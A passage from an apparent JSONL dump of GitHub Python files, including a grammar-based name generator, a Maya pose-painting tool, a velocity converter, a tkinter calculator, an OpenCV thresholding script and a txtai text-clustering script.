\"cat\", 0.5 ]\n ]\n }\n\n Args:\n grammar: str\n Returns:\n dict\n \"\"\"\n weight_re = r\"%((?:[\\d]*\\.)?[\\d]+)\"\n\n result = defaultdict(list)\n for line in grammar.splitlines():\n if \"->\" in line:\n symbol, extension = line.split(\"->\")\n for extension in extension.split(\"|\"):\n weight = re.search(weight_re, extension)\n if weight:\n extension = re.sub(weight_re, \"\", extension)\n weight = float(weight.group(1))\n else:\n weight = 1.0\n result[symbol.strip()].append((extension.strip(), weight))\n\n # normalize\n for symbol, extensions in result.items():\n total_weight = sum(ext[1] for ext in 
extensions)\n result[symbol] = [(ext[0], ext[1] / total_weight) for ext in extensions]\n\n return dict(result)\n\n def transform(self, parts, rule):\n if rule == \"gen\":\n if parts[-1].rstrip().endswith(\"s\"):\n parts[-1] = parts[-1].rstrip() + \"'\"\n else:\n parts[-1] = parts[-1].rstrip() + \"'s\"\n if rule == \"initial\":\n return [p[0].upper() for p in parts]\n if rule == \"title\":\n return [p if p in (\"by\", \"of\", \"and\") else p.capitalize() for p in parts]\n return parts\n\n def extend_rule(self, symbol=\"@s\", max_depth=8):\n \"\"\"Start with a symbol and returns a list of tokens.\n\n Args:\n symbol: str -- should start with @\n max_depth: int -- maximum tree depth.\n Returns:\n list -- list of parts\n Raises:\n MaximumDepthExceeded\n SymbolNotFound\n \"\"\"\n rule = None\n if \"~\" in symbol:\n symbol, rule = symbol.split(\"~\")\n if max_depth == 0:\n raise MaximumDepthExceeded\n if symbol not in self.grammar:\n raise SymbolNotFound(symbol)\n extension = self.weighted_choice(*zip(*self.grammar[symbol]))\n result = self.extend_sentence(extension, max_depth)\n return self.transform(result, rule)\n\n def extend_sentence(self, sentence, max_depth=8):\n result = []\n for part in sentence.replace(\"\\n\", \"\\n \").split(\" \"):\n if part.startswith(\"@\"):\n result.extend(self.extend_rule(part, max_depth - 1))\n else:\n result.append(part)\n return result\n\n # def extend_all(sentence, grammar, max_depth=8):\n # if max_depth == 0:\n # yield \" \".join(sentence)\n # else:\n # if not isinstance(sentence, list):\n # sentence = sentence.split()\n # first_chars = [c[0] for c in sentence]\n # try:\n # part = first_chars.index(\"@\")\n # for extension, pr in grammar[sentence[part]]:\n # for r in extend_all(sentence[:part] + [extension] + sentence[part + 1:], grammar, max_depth - 1):\n # yield r\n # except ValueError:\n # yield \" \".join(sentence)\n\n def assemble_sentence(self, parts):\n \"\"\"Clean up parts and applies some syntactic rules.\n\n Args:\n parts: list\n Returns:\n str\n \"\"\"\n sentence = \" \".join(parts)\n sentence = re.sub(r\" ([,.!?])\", r\"\\1\", sentence)\n sentence = re.sub(r\"' ([A-Za-z0-9 ]+) '\", r\"'\\1'\", sentence)\n sentence = re.sub(r\" +\", r\" \", sentence)\n sentence = re.sub(r\"\\n \", \"\\n\", sentence)\n return sentence.strip()\n\n def generate(self, sentence=None):\n \"\"\"Generate a sentence from a grammar string.\n\n Args:\n grammar: str\n Returns:\n str\n \"\"\"\n parts = None\n while not parts:\n try:\n parts = self.extend_sentence(sentence)\n except MaximumDepthExceeded:\n pass\n except SymbolNotFound as e:\n print(f\"WARNING: Symbol {e.args[0]} not found\", file=sys.stderr)\n return self.assemble_sentence(parts)\n\n\nNAMES = Grammar.load(\"names\")\nGUILDS = Grammar.load(\"guild_names\")\nLETTER = Grammar.load(\"letter\")\n","repo_name":"maebert/shellcraft","sub_path":"src/shellcraft/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"16454828497","text":"import pymel.core as pm\nimport maya.mel as mel\n\nimport model.blendnode\n\n# set up blend shape\ndef paint_weight_pose(base_mesh, pose_mesh, open_weights_tool=True):\n\t'''\n\tCreate a blendshape that allows the user to paint one pose onto another.\n\t:param PyNode base_mesh: The mesh that is the source. It is used to paint onto the other mesh.\n\t:param PyNode pose_mesh: The mesh that is the target. 
The base mesh gets painted onto this mesh.\n\t:param bool open_weights_tool: Opens the maya blendshape weight tool\n\t:return:\n\t'''\n\t# create network\n\tnetwork_node = paint_weight_network.create()\n\n\tblendnode = model.blendnode.BlendShapeNode.create(base_mesh, pose_mesh)\n\tblendnode.attr(base_mesh).set(1)\n\n\tblendnode.addAttr('network_pbs', at='message')\n\tbase_mesh.addAttr('network_pbs', at='message')\n\tpose_mesh.addAttr('network_pbs', at='message')\n\n\tnetwork_node.connect_meshes(base_mesh, pose_mesh)\n\tnetwork_node.connect_blendnode(blendnode)\n\n\tblendnode.set_weights(pose_mesh)\n\tpm.select(pose_mesh)\n\tif open_weights_tool:\n\t\tmel.eval('ArtPaintBlendShapeWeightsToolOptions')\n\n\treturn\n\n\ndef paint_weight_pose_finish(pose_name):\n\t# quit maya paint tool\n\tmeta_node = get_paint_weight_network()\n\tnew_pose = None\n\tif meta_node:\n\t\tnew_pose = meta_node.new_pose(pose_name=pose_name)\n\t\tif new_pose.hasAttr('network_pbs'):\n\t\t\tnew_pose.deleteAttr('network_pbs')\n\t\tmeta_node.remove_attrs()\n\t\tmeta_node.delete_blendnode()\n\t\tmeta_node.delete()\n\treturn new_pose\n\n\ndef cancel_paint_weight_pose():\n\tmeta_node = get_paint_weight_network()\n\tif meta_node:\n\t\tmeta_node.remove_attrs()\n\t\tmeta_node.delete_blendnode()\n\t\tmeta_node.delete()\n\ndef reset_scene():\n\tmeshes = pm.ls(type=pm.nt.Transform)\n\tmeta_node = get_paint_weight_network()\n\tmesh_count = 0\n\tmeta_found = False\n\tfor x in meshes:\n\t\tif x.hasAttr('network_pbs'):\n\t\t\tmesh_count += 1\n\t\t\tx.deleteAttr('network_pbs')\n\tif meta_node:\n\t\tmeta_node.delete()\n\t\tmeta_found = True\n\n\tmeta_str = 'No Meta Node found.'\n\tif meta_found:\n\t\tmeta_str = 'Meta Node was found and deleted.'\n\n\tmessage = '{0} meshes were cleaned. 
{1}'.format(mesh_count, meta_str)\n\n\tpm.confirmDialog(t='Reset Scene', message=message)\n\n\n############################################################################\n\ndef get_paint_weight_network():\n\tnetworks = pm.ls(type=pm.nt.Network)\n\tfor node in networks:\n\t\tif node.hasAttr('is_paint_weight_network') and node.is_paint_weight_network.get():\n\t\t\treturn paint_weight_network(node)\n\nclass paint_weight_network:\n\tVERSION = 1.0\n\n\tdef __init__(self, network_node):\n\t\tif not isinstance(network_node, pm.nt.Network):\n\t\t\tnetwork_node = pm.PyNode(network_node)\n\t\tself.network_node = network_node\n\n\t@classmethod\n\tdef create(cls, name='paint_weight_network_node'):\n\t\tnetwork_node = pm.createNode('network', name=name)\n\t\tnetwork_node.addAttr('meta_type', dt='string')\n\t\tnetwork_node.addAttr('version', at='double')\n\t\tnetwork_node.addAttr('is_paint_weight_network', at='bool')\n\t\tnetwork_node.addAttr('base_mesh', at='message')\n\t\tnetwork_node.addAttr('pose_mesh', at='message')\n\t\tnetwork_node.addAttr('paint_blendnode', at='message')\n\n\t\tnetwork_node.meta_type.set(paint_weight_network.__name__)\n\t\tnetwork_node.version.set(paint_weight_network.VERSION)\n\t\tnetwork_node.is_paint_weight_network.set(True)\n\t\tpm.lockNode(network_node, lock=True)\n\t\treturn cls(network_node)\n\n\tdef connect_meshes(self, base_mesh, pose_mesh):\n\t\tif not base_mesh.hasAttr('network_pbs'):\n\t\t\tbase_mesh.addAttr('network_pbs', at='message')\n\t\tif not pose_mesh.hasAttr('network_pbs'):\n\t\t\tpose_mesh.addAttr('network_pbs', at='message')\n\t\tself.network_node.base_mesh >> base_mesh.network_pbs\n\t\tself.network_node.pose_mesh >> pose_mesh.network_pbs\n\n\tdef connect_blendnode(self, blendnode):\n\t\tif not blendnode.hasAttr('network_pbs'):\n\t\t\tblendnode.addAttr('network_pbs', at='message')\n\t\tself.paint_blendnode >> blendnode.network_pbs\n\n\tdef get_base_mesh(self):\n\t\treturn self.network_node.base_mesh.get()\n\n\tdef get_pose_mesh(self):\n\t\treturn self.network_node.pose_mesh.get()\n\n\tdef get_blendnode(self):\n\t\treturn self.network_node.paint_blendnode.get()\n\n\tdef remove_attrs(self):\n\t\tbase_mesh = self.get_base_mesh()\n\t\tpose_mesh = self.get_pose_mesh()\n\t\tbase_mesh.deleteAttr('network_pbs')\n\t\tpose_mesh.deleteAttr('network_pbs')\n\n\tdef delete_blendnode(self):\n\t\tblendnode = self.get_blendnode()\n\t\tpm.delete(blendnode)\n\n\tdef new_pose(self, pose_name):\n\t\tpose_mesh = self.pose_mesh.get()\n\t\tnew_pose = pm.duplicate(pose_mesh, n=pose_name)[0]\n\t\treturn new_pose\n\n\tdef delete(self):\n\t\tpm.lockNode(self.network_node, lock=False)\n\t\tpm.delete(self.network_node)\n\n\tdef __str__(self):\n\t\treturn self.network_node.__str__()\n\n\tdef __getattr__(self, attrname):\n\t\tif attrname == 'pynode':\n\t\t\traise AttributeError(\"this instance of {0} has no pynode\".format(self.__class__.__name__))\n\t\treturn getattr(self.network_node, attrname)\n\n\tdef __melobject__(self):\n\t\treturn self.network_node.__melobject__()\n\n\tdef __repr__(self):\n\t\treturn self.network_node.__repr__()\n\n\n\n\n\n","repo_name":"deathglitch/metarigging","sub_path":"python/model/ui_tools/paint_pose.py","file_name":"paint_pose.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33661262788","text":"#############################################################################\r\n#\r\n# The [Algoríthm: algconbunveloc.py] will calculus the value of the 
velocity\r\n# nas Unidades: [Mph] ou [Kph] ou [Mps] ou [foot/s].\r\n# Developed by Isabelle G. Girodo -- Version: 1.2(Stable)\r\n# Date: 20221001\r\n#\r\n#############################################################################\r\n\r\nfrom ConvUnidVelocidade import *\r\n\r\nprint(\"\\n\\t\\t\\t====================================\")\r\nprint(\"\\t\\t\\t* [ALGORÍTHM: ALGCONBUNVELOCID.PY] *\")\r\nprint(\"\\t\\t\\t====================================\")\r\n\r\nprint('\\n\\n\\tºº[ DEFINITION OF THE VARIABLES GETED IN RESULT ]ºº\\n')\r\nprint('\\t--[Mph]: Mile per hour')\r\nprint('\\t--[Kph]: Kilometer per hour')\r\nprint('\\t--[Mps]: Meter per second')\r\nprint('\\t--[Fts]: Foot per second')\r\n\r\nprint(\"\\n\\n\\t<<[ INSTRUCTIONS FOR USE ]>>\\n\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Mile per hour] key [1]\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Kilometer per hour] key [2]\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Meter per second]key [3]\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Foot per second]key [4]\")\r\n\r\ndef InstMens1():\r\n print(\"\\t+ If the [Velocity Unit] is given in [Mph] key: [i] or [I].\")\r\n return\r\n\r\ndef InstMens2():\r\n print(\"\\t+ If the [Velocity Unit] is given in [Kph] key: [k] or [K].\")\r\n return\r\n\r\ndef InstMens3():\r\n print(\"\\t+ If the [Velocity Unit] is given in [Mps] key: [m] or [M].\")\r\n return\r\n\r\ndef InstMens4():\r\n print(\"\\t+ If the [Velocity Unit] is given in [Fts] key: [f] or [F].\")\r\n return\r\n\r\ndef Resultado1():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Mph,\"<10.2f\"),\"Mph\")\r\n return\r\n\r\ndef Resultado2():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Kph,\"<10.2f\"),\"Kph\")\r\n return\r\n\r\ndef Resultado3():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Mps,\"<10.2f\"),\"Mps\")\r\n return\r\n\r\ndef Resultado4():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Fts,\"<10.2f\"),\"fts\")\r\n return\r\n\r\ndef Unidade():\r\n u = input(\"\\n\\t<> Select a only [previous variable] of [Velocity Unit] given in problem? \")\r\n return u\r\n\r\ndef View():\r\n print(\"\\n\\n\\t\\t--[NONE OF THE OPTIONS PREVIOUS WAS USED!]--\")\r\n print(\"\\t-_- [ USE THE PROGRAM: ALGCONBUNVELOC.PY AGAIN -- OK! ]\\n\")\r\n return\r\n\r\ndef introduce():\r\n while True:\r\n try:\r\n def enterIntegerData():\r\n x = int(input('\\t(º>º) Provide the [new] value? '))\r\n return x\r\n coeffic = enterIntegerData()\r\n\r\n while coeffic <= 0:\r\n print('\\n\\t*[ NO TYPE AN [NEGATIVE INTEGER NUMBER] or equal [ZERO]--Ok! 
]*\\n')\r\n coeffic = enterIntegerData()\r\n\r\n print('\\t **[The typed number]:',coeffic,'is a [valid float number!]**\\n')\r\n return coeffic\r\n except ValueError as err:\r\n print('\\t ###')\r\n print('\\t º>º [Warning!]:',err)\r\n print('\\t \\~/ [TYPE AN NEW POSITIVE INTEGER NUMBER IN NEXT INSTRUCTION -- OK!]\\n') \r\n\r\nnumber = introduce()\r\n\r\nif number == 1:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IS IN MILE PER HOUR(Mph)]--\\n\")\r\n InstMens2()\r\n InstMens3()\r\n InstMens4()\r\n unid = Unidade()\r\n if unid == 'k' or unid == 'K':\r\n Mph = Mile1()\r\n Solução = Resultado1()\r\n elif unid == 'm' or unid == 'M':\r\n Mph = Mile2()\r\n Solução = Resultado1()\r\n elif unid == 'f' or unid == 'F':\r\n Mph = Mile3()\r\n Solução = Resultado1()\r\n else:\r\n View()\r\n \r\nelif number == 2:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IN KILOMETER PER HOUR(Kph)]--\\n\")\r\n InstMens1()\r\n InstMens3()\r\n InstMens4()\r\n unid = Unidade()\r\n if unid == 'i' or unid == 'I':\r\n Kph = Kilometer1()\r\n Solução = Resultado2()\r\n elif unid == 'm' or unid == 'M':\r\n Kph = Kilometer2()\r\n Solução = Resultado2()\r\n elif unid == 'f' or unid == 'F':\r\n Kph = Kilometer3()\r\n Solução = Resultado2()\r\n else:\r\n View()\r\n\r\nelif number == 3:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IN METER PER SEGUNDO(Mps)]--\\n\")\r\n InstMens1()\r\n InstMens2()\r\n InstMens4()\r\n unid = Unidade()\r\n if unid == 'i' or unid == 'I':\r\n Mps = Meter1()\r\n Solução = Resultado3()\r\n elif unid == 'k' or unid == 'K':\r\n Mps = Meter2()\r\n Solução = Resultado3()\r\n elif unid == 'f' or unid == 'F':\r\n Mps = Meter3()\r\n Solução = Resultado3()\r\n else:\r\n View()\r\n\r\nelif number == 4:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IN FOOT PER SECOND(Fts)]--\\n\")\r\n InstMens1()\r\n InstMens2()\r\n InstMens3()\r\n unid = Unidade()\r\n if unid == 'i' or unid == 'I':\r\n Fts = Foot1()\r\n Solução = Resultado4()\r\n elif unid == 'k' or unid == 'K':\r\n Fts = Foot2()\r\n Solução = Resultado4()\r\n elif unid == 'm' or unid == 'M':\r\n Fts = Foot3()\r\n Solução = Resultado4()\r\n else:\r\n View()\r\nelse:\r\n View()\r\n\r\nprint(\"\\n\\n\\t\\t\\t ////\")\r\nprint(\"\\t\\t\\t º<º . . .[END PROGRAM -- OK!]. . .\")\r\nprint(\"\\t\\t\\t \\-/\")\r\n\r\ninput(\"\\n\\n\\t\\t. . .KEY [ENTER] TO EXIT OF THE PROGRAM!. . 
.\\n\")\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n","repo_name":"cristovomgirodo/Conversions-between-Velocitys","sub_path":"algconbunveloc.py","file_name":"algconbunveloc.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41593034391","text":"it = np.nditer(AA, flags=[\"multi_index\"], op_flags=[\"readwrite\"])\nwhile not it.finished :\n idx = it.multi_index\n print(AA[idx])\n it.iternext()\n\nlist2 = [n for n in range(10, 90, 10)] \nAA = np.array(list2)\nAA = A.reshape(2,4)\nDD = np.concatenate((AA, np.array([1,2,3,4]).reshape(1,4)), axis=0)\n\ndata = np.loadtxt(r\"C:\\images\\Etc_Raw\\sdf.csv\", delimiter=',', dtype=np.int32)","repo_name":"Roasters/ComputerVision","sub_path":"npTechniques.py","file_name":"npTechniques.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23571360681","text":"# your code goes here\r\nfrom sys import stdin\r\n\r\nt = int(stdin.readline().strip())\r\nfor iii in range(t):\r\n n,k = [int(x) for x in stdin.readline().strip().split() ]\r\n s = [1,n+2]\r\n for i in range(k):\r\n mmax,mmin,pos = -1,-1,-1\r\n for j in range(len(s)-1):\r\n if s[j]==s[j+1]+1: continue\r\n tpos = int((s[j]+s[j+1])/2)\r\n tmmax = max(abs(tpos-s[j]),abs(tpos-s[j+1]))\r\n tmmin = min(abs(tpos-s[j]),abs(tpos-s[j+1]))\r\n if tmmin>mmin:\r\n mmin=tmmin\r\n mmax=tmmax\r\n pos = tpos\r\n elif tmmin==mmin and tmmax>mmax:\r\n mmax=tmmax\r\n pos = tpos\r\n s.append(pos)\r\n s.sort()\r\n print('Case #{0}: {1} {2}'.format(iii+1,mmax-1,mmin-1))\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2782.py","file_name":"2782.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4473033123","text":"from tkinter import *\nfrom tkinter import Tk\nfrom turtle import color\n\n# cores\n\ncor1 = \"#1e1f1e\" # preto\ncor2 = \"#ffffff\" # branco\ncor3 = \"#38576b\" # azul\ncor4 = \"#404040\" # cinza\ncor5 = \"#FFAB40\" # laranja\n\njanela = Tk()\njanela.title('Calculadora')\njanela.geometry(\"235x310\")\njanela.config(bg=cor1)\n\n# frames\nframe_tela = Frame(janela, width=235, height=50, bg=cor1)\nframe_tela.grid(row=0, column=0)\n\nframe_corpo = Frame(janela, width=235, height=268, bg=cor3)\nframe_corpo.grid(row=1, column=0)\n\n\n# variavel todos valores\n\ntodos_valores = ''\nvalor_texto = StringVar()\n\n#criando funcao\n\ndef digita_valor(event):\n \n global todos_valores\n \n todos_valores =todos_valores + str(event)\n\n #mostra o valor na tela\n \n valor_texto.set(todos_valores)\n\n# funcao para calcular\n\ndef calcular():\n global todos_valores\n resultado = eval(todos_valores)\n \n valor_texto.set(str(resultado))\n\n# funcao limpa tela\n\ndef limpar_tela():\n global todos_valores\n todos_valores = \"\"\n valor_texto.set(\"\")\n\n# criando label\n\napp_label = Label(frame_tela, textvariable=valor_texto, width=16, height=2, padx=7, relief=FLAT, anchor=\"e\", justify=RIGHT, font=('Ivy 18'), bg=cor1, fg=cor2)\napp_label.place(x=0,y=0)\n\n#botoes\n\nb_1 = Button(frame_corpo, command=limpar_tela, text=\"C\", width=11, height=2, bg=cor2, font=('Ivy 13 bold'), relief=GROOVE, overrelief=FLAT)\nb_1.place(x=0, y=0)\nb_2 = Button(frame_corpo, command= lambda: digita_valor('%'),text=\"%\", width=5, height=2, bg=cor2, font=('Ivy 13 bold'), relief=GROOVE, 
overrelief=FLAT)\nb_2.place(x=120, y=0)\nb_3 = Button(frame_corpo, command=lambda: digita_valor('/'), text=\"/\", width=5, height=2, bg=cor5, fg=cor2, font=('Ivy 13 bold'), relief=GROOVE, overrelief=FLAT)\nb_3.place(x=180, y=0)\n\nb_4 = Button(frame_corpo, command= lambda: digita_valor('7'), text=\"7\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_4.place(x=0, y=52)\nb_5 = Button(frame_corpo, command= lambda: digita_valor('8'), text=\"8\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_5.place(x=60, y=52)\nb_6 = Button(frame_corpo, command= lambda: digita_valor('9'), text=\"9\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_6.place(x=120, y=52)\nb_7 = Button(frame_corpo, command= lambda: digita_valor('*'), text=\"*\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_7.place(x=180, y=52)\n\nb_8 = Button(frame_corpo, command= lambda: digita_valor('4'), text=\"4\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_8.place(x=0, y=104)\nb_9 = Button(frame_corpo, command= lambda: digita_valor('5'),text=\"5\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_9.place(x=60, y=104)\nb_10 = Button(frame_corpo, command= lambda: digita_valor('6'),text=\"6\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_10.place(x=120, y=104)\nb_11 = Button(frame_corpo, command= lambda: digita_valor('-'), text=\"-\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_11.place(x=180, y=104)\n\nb_12 = Button(frame_corpo, command= lambda: digita_valor('1'), text=\"1\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_12.place(x=0, y=156)\nb_13 = Button(frame_corpo, command= lambda: digita_valor('2'), text=\"2\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_13.place(x=60, y=156)\nb_14 = Button(frame_corpo, command= lambda: digita_valor('3'), text=\"3\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_14.place(x=120, y=156)\nb_15 = Button(frame_corpo, command= lambda: digita_valor('+'), text=\"+\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_15.place(x=180, y=156)\n\nb_16 = Button(frame_corpo, command= lambda: digita_valor('0'), text=\"0\",width=11, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_16.place(x=0, y=208)\nb_17 = Button(frame_corpo, command= lambda: digita_valor('.'), text=\".\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_17.place(x=120, y=208)\nb_18 = Button(frame_corpo, command= calcular, text=\"=\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_18.place(x=180, y=208)\n\n\njanela.mainloop()\n","repo_name":"Felipe-OLV/Projeto_1_Calculadora","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15663489613","text":"import cv2\n\n# 画像の読み込み\nimg = cv2.imread(\"6632749D-F045-4866-89A2-88EDF54477E5.jpeg\", 0)\n\n# 閾値の設定\nthreshold = 100\n\nret2, img_otsu = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)\n\n#閾値がいくつになったか確認\nprint(\"ret2: {}\".format(ret2))\n\n#画像の確認\n#cv2.imshow(\"otsu\", 
img_otsu)\n#cv2.waitKey()\n#cv2.destroyAllWindows()\n\ncv2.imwrite('opencv_2_cvtcolr.jpg', img_otsu)","repo_name":"2022AIT-OOP2-G05/web-image-processing-11","sub_path":"2chika/2chika.py","file_name":"2chika.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37633505154","text":"#import libraries \r\nfrom txtai.embeddings import Embeddings\r\nimport json\r\nimport pandas as pd\r\n\r\n#import prelearned ai\r\nembeddings = Embeddings({\r\n \r\n \"path\": \"sentence-transformers/all-MiniLM-L6-v2\"\r\n})\r\n\r\n#load data into dataframe\r\nwith open(\"data.json\", \"r\") as f:\r\n json_data = json.load(f)\r\n data = pd.DataFrame(json_data)\r\n\r\n#filter out duplicates\r\ndata.drop_duplicates(subset = 'FAULT_ID', inplace = True, keep = \"first\")\r\n#reset indexes to not break the range functions later on\r\ndata.reset_index(drop = True, inplace = True)\r\n\r\n#Have ai index all text\r\ntxtai_data = []\r\nfor text, row in data.iterrows():\r\n txtai_data.append((text, row['FAULT_LINE_TEXT'], None))\r\nembeddings.index(txtai_data)\r\n\r\ndef ULists():\r\n #Create List of all clusters with size 1\r\n UList1 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n #Similarity of 0.5 or more\r\n if r[1] > 0.5:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList1.append(list)\r\n\r\n UList2 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.6:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList2.append(list)\r\n\r\n UList3 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.7:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList3.append(list)\r\n\r\n UList4 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.8:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList4.append(list)\r\n\r\n UList5 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.9:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList5.append(list)\r\n \r\n#Printing Lists for now \r\n print(UList1)\r\n print(UList2)\r\n print(UList3)\r\n print(UList4)\r\n print(UList5)\r\n\r\ndef GLists():\r\n #Find Generalized Lists \r\n GList1 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n #Similarity of 0.5 or more\r\n if r[1] > 0.5:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n #Only add to GList if length is greater than 1\r\n if len(list) > 1:\r\n GList1.append(list)\r\n\r\n GList2 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.6:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList2.append(list)\r\n\r\n GList3 = []\r\n for i in range(0,500):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.7:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList3.append(list)\r\n\r\n GList4 = []\r\n for i in range(0,100):\r\n res = 
embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.8:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList4.append(list)\r\n\r\n GList5 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.9:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList5.append(list)\r\n\r\n#Printing Lists for now\r\n #return(GList1)\r\n #return(GList2)\r\n print(GList3)\r\n #return(GList4)\r\n #return(GList5)\r\n\r\n#Call Functions wanted to run\r\n\r\ndef mech(GList):\r\n gen = []\r\n print(GList)\r\n for i in range(len(GList)):\r\n for j in range(len(GList)):\r\n if GList[i] != GList[j]:\r\n com = [item for item in GList[i] if item in GList[j]]\r\n if com:\r\n gen.append(com)\r\n print(gen)\r\n\r\nGLists()\r\n","repo_name":"Luquintero24/Lockheed-Project","sub_path":"testai.py","file_name":"testai.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22526303629","text":"#!/usr/bin/env python\n\nimport sys\n\ncontig = \"NC_045512.2\"\ncoverage_data = {}\n\nfor filename in sys.argv[1:]:\n sample = filename.split('/')[0]\n coverage_data[sample] = [-1 for cov in range(29904)]\n\n with open(filename, \"r\") as sample_coverage:\n for read_depth_data in sample_coverage.readlines():\n read = read_depth_data.split(\"\\t\")\n\n position = int(read[1]) - 1\n coverage = int(read[2])\n\n coverage_data[sample][position] = coverage\n\nsamples = sorted(coverage_data.keys())\n\nwith open(\"coverage.tsv\", \"w+\") as coverage:\n coverage.write(\"contig\\tposition\")\n for sample in samples:\n coverage.write(\"\\t\" + sample)\n coverage.write(\"\\n\")\n\n for position in range(29903):\n coverage.write(contig + \"\\t\" + str(position + 1))\n for sample in samples:\n coverage.write(\"\\t\" + str(coverage_data[sample][position]))\n coverage.write(\"\\n\")","repo_name":"michaeljon/pipeline-builder","sub_path":"tools/joiner.py","file_name":"joiner.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29838014207","text":"from __future__ import with_statement\nimport urlparse\nimport datetime as dt\nfrom fiftystates.scrape.oh import metadata\nfrom fiftystates.scrape.oh.utils import chamber_name, parse_ftp_listing\nfrom fiftystates.scrape.bills import BillScraper, Bill\nfrom 